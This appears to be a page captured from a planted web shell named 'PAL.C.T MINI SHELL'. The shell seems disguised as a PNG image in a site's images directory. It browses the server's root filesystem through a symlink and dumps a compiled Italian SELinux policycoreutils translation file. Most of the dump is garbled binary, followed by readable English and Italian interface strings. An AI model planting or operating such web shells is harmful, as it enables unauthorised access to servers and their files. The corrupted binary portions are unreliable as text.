php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/it/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/it/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"Fқ)OFL4G'`N8ם1Pcuƞ#!>!Y{BΟ]]y0נ4a=;5ۡ|;-ʢ@\9X$/*D'o-8ŤdMcSj8@180j+Pǧ&[?AzݨTX\4
<?`|7ݪ;ZQ14ޫJ%^X1]1t,)ӮA\?@)M wB
5'JAr:-)*GrQK"1CPL*%ȶ2'!+I%u,)ȷ:2-5`B7ٸ>5P$,*ع$'(&P%w(+ƺ'#*>%i')$$1+&]-$-׼!0'*X%%'Ͻ" (;"d/%ݾ,((Q*o%%2'+A%m&/3	(=&f%'B+&J+q82.	189j)5?>DFD!Q17<;C4Ax;:B1@t<;C.Ar(--'9af$%16B.y2>83S00++3A7u58*8G4644!-V*5697V4<?4@.u2464C)x+)25+4a446476l67.6A8x7-22J7}630 4Q637;)4e3739:4t6646L4452#3V2,453U5546*3a333213d+5621,d868,:9g&3300/a(131 'R+z-0'3-3a0&159U4):2)4\0111&2X151/%3U0038/X2126 0W/431!2S43/5/U/22"(@KK@v
Z	9[TD.D(c,%.*(!S(u* !%#2"VPy
'3@
[i}O+
 9JYeD  6Vu~

$@KV'	
	!*Ljv!9FDV\`d
iw
"!)	<
FQXoB7(>`
$"&*Qo)"7R X0y +	5N
d"rIGF#%<S$,x=!3B9^|.&F[g=}@A>NTi+((Q444=@9~:8:,Cg1m- &/,E%r!	
		5	+T		&	0		e
i
z



_"!
&
68'`}P)
$.
FS
N
#
5
	CMYka24#NAr-.0+'\)  $$#:!^&&M6'Q&+7(LNk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: it
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-28 11:49+1000
Last-Translator: 
Language-Team:  <it@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: 
Plural-Forms: nplurals=2; plural=(n != 1);
X-Generator: KBabel 1.11.4
X-Poedit-Language: Italian
X-Poedit-Country: ITALY
%s etichette cambiate.
%s è già in %s%s non è un contesto valido
%s non è in %s%s deve essere una directory%s!  Impossibile ottenere il contesto corrente per %s, tty non rietichettante.
%s!  Impossibile ottenere il nuovo contesto per %s, tty non rietichettante.
%s!  Impossibile impostare il nuovo contesto per %s
%s:  Non posso caricare la policy e modalità enforcing richiesta:  %s
%s:  Non posso caricare la policy:  %s
%s:  La policy è stata già caricata ed il carico inziale è stato richiesto
******************** IMPORTANTE ***********************
...600-1024<b>Applicazioni</b><b>Utenti di registrazione</b><b>Utenti root</b><b>Seleziona:</b><b>Porte TCP</b><b>Porte UDP</b>AggiungiAggiungi %sAggiungi dialogo booleanaAggiungi contesto del fileAggiungi porta di reteAggiungi mappatura login di SELinuxAggiungi porte di rete di SELinuxAggiungi utente di SELinuxAggiungi mappatura utente SELinuxAggiungi utenteL'indirizzo %s è definito nella policy, non può essere eliminatoIndirizzo %s non definitoAmministratoreRuolo Utente amministratoreTutte/iPermetti all'utente webadm di SELinux di gestire le directory home di utenti non privilegiatiPermetti all'utente webadm di SELinux di leggere le home directory di utenti non privilegiatiPermetti a Samba di condividere le directory nfsPermetti l'accesso alla rete del demone Spam AssasinPermetti al server di X-Windows di mappare una regione della memoria come eseguibile e scrivibilePermetti a tutti i demoni di utilizzare i tty non assegnatiPermetti a tutti i demoni di scrivere i corefile su /Permetti a cdrecord di leggere vari contenuti. nfs, samba, dispositivi estraibili, user-temp e file con contenuti non fidatiPermetti ai client di scrivere sulla memoria condivisa di XPermetti ai demoni di essere eseguiti con NISPermetti a evolution e thunderbird di leggere i file dell'utentePermetti all'account utente di SELinux gadmin di eseguire i file nella home directory o /tmpPermetti all'account utente SELinux guest di eseguire i file nella home directory o /tmpPermetti lo stack eseguibile di javaPermetti a mount di montare qualsiasi directoryPermetti a mount di montare qualsiasi filePermetti lo stack eseguibile di mplayerPermetti agli utenti normali di eseguire pingPermetti a pppd di essere eseguito per un utente normalePermetti alle utilità privilegiate, come hotplug e insmod, di essere eseguite in modo non confinatoPermetti ai programmi di leggere i file in posizioni non-standard (default_t)Permetti agli script rc di essere eseguiti come non confinati, incluso qualsiasi demone avviato da uno script rc che non possiede una transizione del dominio definita in modo esplicitoPermetti l'accesso diretto del mouse agli utenti normali (abilita solo il server X)Permetti ad rpm di essere eseguito in modo non confinatoPermetti al server di autenticazione sasl di leggere /etc/shadowPermetti a spamd di accedere alle home directory Permetti al demone squid di collegarsi alla retePermetti i login ssh come sysadm_r:sysadm_tPermetti a ssh di essere eseguito da inetd invece di essere eseguito come demonePermetti a ssh di eseguire ssh-keysignPermetti all'account utente di SELinux staff di eseguire i file nella home directory o /tmpPermetti ai web browser di staff di scrivere sulle home directoryPermetti agli utenti staff_r di eseguire una ricerca della home dir di sysadm e leggere i file (come ad esempio ~/.bashrc)Permetti al demone stunnel di essere eseguito come standalone, esternamente a xinetdPermetti all'account utente di SELinux sysadm di eseguire i file nella home directory o /tmpPermetti a sysadm_t di avviare direttamente i demoniPermetti al browser di mozilla di leggere i file dell'utentePermetti all'account utente di SELinux unconfined di eseguire i file nella home directory o /tmpPermetti non confinato a dyntrans su unconfined_execmemPermetti ai pacchetti non etichettati di percorrere la retePermetti all'account utente di SELinux user di eseguire i file nella home directory o /tmpPermetti all'utente di collegarsi al socket mysqlPermetti all'utente di collegarsi al socket postgresPermetti all'utente di leggere/scrivere noextattrfile (FAT, CDROM, FLOPPY)Permetti agli utenti lo stat ttyfilesPermetti a user_r di raggiungere sysadm_r tramite su, sudo, o userhelper. Altrimenti solo staff_r può eseguire tale operazionePermetti agli utenti di controllare le interfacce di rete (necessita anche USERCTL=true)Permetti agli utenti di eseguire il comando mountPermetti agli utenti di eseguire i server TCP (unisci alle porte ed accetta il collegamento dallo stesso dominio ed utenti esterni),  disabilitandolo verrà forzata la modalità passiva FTP e potrete modificare altri protocolli.Permetti agli utenti di eseguire il comando dmesgPermetti agli utenti di rw i dispositivi usbPermetti login xdm come sysadm_r:sysadm_tPermetti a xen di leggere/scrivere i dispositivi fisici del discoPermetti all'account utente di SELinux xguest di eseguire i file nella home directory o /tmpPermetti a xinetd di essere eseguito come non confinato, incluso qualsiasi servizio avviato che non possiede una transizione del dominio definita in modo esplicitoApplicazioneSiete sicuri di voler cancellare %s '%s'?Formato non valido %s: Record %sBooleanLa booleana %s è definita nella policy, non può essere eliminataLa booleana %s non è definitaNome booleanaCVSImpossibile combinare +/- con altri tipi di categorieImpossibile avere sensitività multipleImpossibile modificare i livelli di sensitività usando '+' su %sImpossibile trovare il tuo record nel file shadow passwd.
Impossibile leggere il deposito della policy.Cambia la modalità processo a enforcing.Cambia la modalità processo a permissive.Modificando il tipo di policy si provocherà la rietichettatura dell'intero file system al prossimo riavvio. La rietichettatura richiederà un temponotevole a seconda della grandezza del file system. Desiderate continuare?Selezionando SELinux disabilitato sarà necessario riavviare il vostro sistema.  Tale azione non è consigliata.  Se desiderate attivare nuovamente SELinux, sarà necessario rietichettare il sistema.  Se desiderate sapere se SELinux è la causa di un problema che si è verificato sul vostro sistema, selezionate la modalità permissiva la quale è in grado di registrare i messaggi senza forzare la policy di SELinux.  La modalità permissiva non richiede un riavvio del sistema    Desiderate continuare?Modificando su SELinux si provocherà la rietichettatura dell'intero filesystem al prossimo riavvio. La rietichettatura richiederà un tempo notevolea seconda della grandezza del file system. Desiderate continuare?CompatibilitàConfigura SELinuxContestoCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Impossibile aggiungere l'utente SELinux %sImpossibile aggiungere l'indirizzo %sImpossibile aggiungere il contesto del file per %sImpossibile aggiungere l'interfaccia %sImpossibile aggiungere login mapping per %sImpossibile aggiungere la porta %s/%sImpossibile aggiungere il prefisso %s per %sImpossibile aggiungere il ruolo %s per %sImpossibile controllare se l'utente SELinux %s è definitoImpossibile controllare se la porta %s è definitaImpossibile controllare se la booleana %s è definitaImpossibile controllare se il contesto del file per %s è definitoImpossibile controllare se l'interfaccia %s è definitaImpossibile controllare se è definito il login mapping per %sImpossibile controllare se la porta %s/%s è definitaImpossibile chiudere i descrittori.
